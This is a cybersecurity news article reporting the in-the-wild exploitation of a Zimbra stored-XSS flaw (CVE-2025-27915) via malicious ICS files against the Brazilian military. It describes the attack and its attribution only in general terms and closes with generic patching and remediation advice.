Close Menu
Cybercrime and Ransomware

Zero-Day Exploit Targets Brazilian Military Through Malicious ICS Files

Staff WriterBy No Comments4 Mins Read1 Views

Quick Takeaways

  1. A zero-day in Zimbra (CVE-2025-27915) involving stored XSS was exploited in cyberattacks on the Brazilian military, allowing arbitrary JavaScript execution via malicious ICS files.
  2. The vulnerability was patched in versions 9.0.0 Patch 44, 10.0.13, and 10.1.5 on January 27, 2025, but was reportedly exploited in the wild beforehand.
  3. Attackers used malicious ICS files to steal credentials, emails, and contacts, and to insert filters that redirect emails to an external server, with stealthy activity maintained for over three days.
  4. Multiple threat actors, including Russian group APT28 and others like Winter Vivern, have exploited similar vulnerabilities in webmail solutions for credential theft and espionage.

Underlying Problem

Earlier this year, a significant zero-day security flaw in Zimbra Collaboration, designated CVE-2025-27915, was exploited by unknown cyber threat actors, notably targeting the Brazilian military. This flaw involved a stored cross-site scripting (XSS) vulnerability in the Web Client, which permitted malicious JavaScript to execute when recipients viewed emails containing infected ICS calendar files. The attackers used this vulnerability to execute arbitrary code within victims’ sessions, allowing them to manipulate email filters, redirect messages, and potentially extract sensitive data. Although Zimbra issued patches for the vulnerability in January 2025, a report from StrikeReady Labs in late September revealed active in-the-wild exploitation, with threat actors disguising themselves as the Libyan Navy’s Office of Protocol to attack the Brazilian military with malicious ICS files. These files carried JavaScript malware designed to steal credentials, emails, contacts, and shared folders, while also secretly forwarding targeted emails to external servers, even hiding their activities for days to evade detection. The identity of the perpetrators remains uncertain, but previous disclosures by security organizations suggest that advanced state-sponsored groups, such as Russia’s APT28, and other espionage units, have previously exploited similar vulnerabilities across various webmail platforms, hinting at a pattern of sophisticated cyber espionage and credential theft campaigns.

Risks Involved

Cyber risks, exemplified by recent exploits targeting Zimbra Collaboration, highlight the persistent threat of sophisticated vulnerabilities, such as zero-day cross-site scripting (XSS) flaws, which can be maliciously exploited to execute arbitrary code, manipulate emails, exfiltrate sensitive data, and establish unauthorized control over victim accounts. These attacks—often orchestrated by state-sponsored or advanced persistent threat (APT) groups like APT28, Winter Vivern, and UNC1151—are typically concealed through tactics like code hiding and timing strategies, making detection difficult and enabling prolonged infiltration. Even when vulnerabilities are patched, actors continue to leverage existing weaknesses and emulate tactics like impersonation and social engineering, resulting in significant impacts including data breaches, operational disruption, and compromised national security, particularly when targeting high-value entities such as military or governmental institutions. The evolving threat landscape underscores the critical need for rigorous security protocols, timely updates, and vigilant monitoring to mitigate these persistent and potentially devastating cyber risks.

Possible Next Steps

In an era where cyber threats evolve rapidly, the timely remediation of vulnerabilities like the Zimbra zero-day exploited to target the Brazilian military via malicious ICS files is crucial. Addressing such exploits swiftly minimizes potential damage, safeguards sensitive information, and maintains operational integrity.

Mitigation Measures:

  • Immediate deployment of the latest security patches and updates for Zimbra.
  • Disable or restrict email attachments that contain or originate from unknown or untrusted sources, especially ICS files.
  • Implement robust email filtering and malware scanning to detect malicious content.
  • Enforce strict user access controls and monitor unusual activity patterns.

Remediation Steps:

  • Conduct a comprehensive security audit to identify compromised systems.
  • Isolate affected servers and devices to prevent further spread.
  • Remove malicious files and malicious code from infected systems.
  • Reset passwords and review user access privileges.
  • Notify relevant authorities and stakeholders about the breach.
  • Develop and distribute updated security policies and training to mitigate future exploits.

Stay Ahead in Cybersecurity

Discover cutting-edge developments in Emerging Tech and industry Insights.

Learn more about global cybersecurity standards through the NIST Cybersecurity Framework.

Disclaimer: The information provided may not always be accurate or up to date. Please do your own research, as the cybersecurity landscape evolves rapidly. Intended for secondary references purposes only.

Cyberattacks-V1

Share.
Avatar photo

John Marcelli is a staff writer for the CISO Brief, with a passion for exploring and writing about the ever-evolving world of technology. From emerging trends to in-depth reviews of the latest gadgets, John stays at the forefront of innovation, delivering engaging content that informs and inspires readers. When he's not writing, he enjoys experimenting with new tech tools and diving into the digital landscape.

Related Posts

Comments are closed.